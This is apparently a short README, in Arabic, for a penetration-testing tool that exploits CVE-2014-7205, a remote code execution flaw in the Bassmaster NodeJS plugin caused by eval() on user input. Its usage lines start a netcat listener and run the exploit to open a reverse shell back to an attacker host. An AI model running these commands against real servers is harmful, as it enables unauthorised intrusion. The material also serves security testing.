
Bassmaster Plugin NodeJS RCE
bassmaster-rce.py: سكربت بايثون لاستغلال الثغرة CVE-2014-7205. nodeshell.py: وحدة بايثون لتوليد شل عكسي لـ NodeJS
!!استخدم فقط ضد الخوادم التي لديك إذن باختبارها
CVE-2014-7205 هي ثغرة تنفيذ أوامر عن بعد في إضافة Bassmaster لـ NodeJS. جميع الإصدارات <= 1.5.1 متأثرة. توجد الثغرة داخل الملف lib/batch.js في الدالة internals.batch حيث تستدعي eval() بإدخال المستخدم الذي لم يتم تجاوزه بشكل صحيح (ببساطة، لا يتحقق التعبير النمطي من أن الطلبات تحتوي على كود ضار).
nc -lvp 4444python3 bassmaster-rce.py -u http://target -p 8080 -l attacker.ip -P 4444